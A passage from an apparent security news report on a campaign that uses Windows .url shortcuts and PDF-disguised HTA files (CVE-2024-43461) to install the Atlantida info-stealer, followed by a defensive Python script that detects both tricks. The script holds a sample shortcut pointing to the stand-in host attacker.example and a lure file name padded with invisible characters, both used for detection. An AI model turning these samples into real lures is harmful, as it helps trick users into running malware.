“Specifically, the attackers used special Windows Internet Shortcut (.url extension name) files, which when clicked, call the retired Internet Explorer (IE) to visit a URL controlled by the attacker,” Li explained in a July research report.
Those attacker-controlled URLs download a malicious HTA file and prompt the user to open it. Once opened, the script installs the Atlantida info-stealer.
The HTA files also exploit CVE-2024-43461 to hide the .hta extension, so the download appears to be a PDF when Windows asks the user whether the file should be opened. Microsoft's fix makes Windows display the actual .hta extension in that prompt, warning users before they run a malicious download.
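The two tricks described above can both be caught with a few lines of triage logic. The following is an added example written for this page, not code from the article, from Check Point, or from Microsoft. It assumes two facts from the public analyses of this campaign rather than from the text here: the .url files force the IE engine by prefixing the target with `mhtml:` (the mechanism Check Point Research described for CVE-2024-38112), and the HTA names hide the real extension by placing a run of invisible characters (Trend Micro reported braille blank characters, U+2800) between a fake `.pdf` and the final `.hta`. The sample .url body, the `attacker.example` host and the sample file name are constructed for the example; the checker also generalizes beyond this one case by treating any Unicode space, format or control character as padding.

```python
"""Triage helpers for the .url -> HTA delivery chain described above.

Added example, not code from the article or any vendor report. Two checks:
  1. parse_url_shortcut(): read the URL= line of a Windows Internet Shortcut
     and flag the mhtml: prefix that forces the link to open in the retired
     IE engine (technique published by Check Point Research, CVE-2024-38112).
  2. deceptive_filename(): flag a file name whose displayed extension (.pdf)
     is followed by invisible characters and then a real executable
     extension such as .hta, the spoofing fixed as CVE-2024-43461.
"""
import unicodedata

# Extensions Windows will execute when the user clicks "Open".
DANGEROUS_EXTENSIONS = {"hta", "exe", "js", "jse", "vbs", "vbe", "wsf",
                        "lnk", "url", "scr", "cmd", "bat", "ps1"}
# Extensions a lure would want the victim to believe they are opening.
BENIGN_LOOKING = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}

# Characters that render as blank in Explorer and in the open-file prompt.
# U+2800 (braille blank) is category "So", so it must be listed explicitly;
# the rest are caught by the Unicode category test below.
INVISIBLE = {"\u2800", "\u00a0", "\u200b", "\u200c", "\u200d", "\u2060",
             "\ufeff", "\u3000"}


def is_invisible(ch: str) -> bool:
    """True for characters that take up space but show nothing on screen."""
    return ch in INVISIBLE or unicodedata.category(ch) in ("Zs", "Cf", "Cc")


def deceptive_filename(name: str) -> dict:
    """Check whether a file name hides an executable extension.

    Returns a dict with the extension the user would see, the extension
    Windows actually acts on, how many invisible padding characters sit
    between them, and a final verdict.
    """
    base, dot, real_ext = name.rpartition(".")
    real_ext = real_ext.lower()
    result = {"deceptive": False, "shown_ext": None,
              "real_ext": real_ext if dot else None, "hidden_chars": 0}
    if not dot or real_ext not in DANGEROUS_EXTENSIONS:
        return result

    # Walk back over invisible padding to find the extension that is shown.
    i = len(base)
    while i > 0 and is_invisible(base[i - 1]):
        i -= 1
    result["hidden_chars"] = len(base) - i
    visible = base[:i]
    _, dot2, shown_ext = visible.rpartition(".")
    if not dot2:
        return result
    result["shown_ext"] = shown_ext.lower()

    # A benign-looking extension in front of a dangerous one is deceptive
    # whether or not it is padded; padding just makes the lure more convincing.
    result["deceptive"] = result["shown_ext"] in BENIGN_LOOKING
    return result


def parse_url_shortcut(text: str) -> dict:
    """Parse the INI-style body of a .url file.

    Returns the URL= target and whether it uses the mhtml: prefix that makes
    Windows hand the link to the IE (Trident) engine instead of Edge.
    """
    target = None
    for line in text.splitlines():
        line = line.strip()
        if line.lower().startswith("url="):
            target = line[4:].strip()
            break
    forces_ie = target is not None and target.lower().startswith("mhtml:")
    return {"target": target, "forces_ie": forces_ie}


# Constructed sample inputs (not from the article): a shortcut body modelled on
# the published mhtml: technique, and a lure name padded with 26 braille blanks.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://attacker.example/x!x-usc:http://attacker.example/x\r\n"
    "ShowCommand=7\r\n"
)
SAMPLE_HTA_NAME = "Books_A0UJKO.pdf" + "\u2800" * 26 + ".hta"

if __name__ == "__main__":
    print(parse_url_shortcut(SAMPLE_URL_FILE))
    print(deceptive_filename(SAMPLE_HTA_NAME))
```

In a detection pipeline the same two functions run over e-mail attachment names and over the `URL=` line of any `.url` file seen in a download directory; after Microsoft's fix the prompt shows the `.hta` suffix, but the padded name still reaches the filesystem, so the name check remains a useful hunt query for older samples.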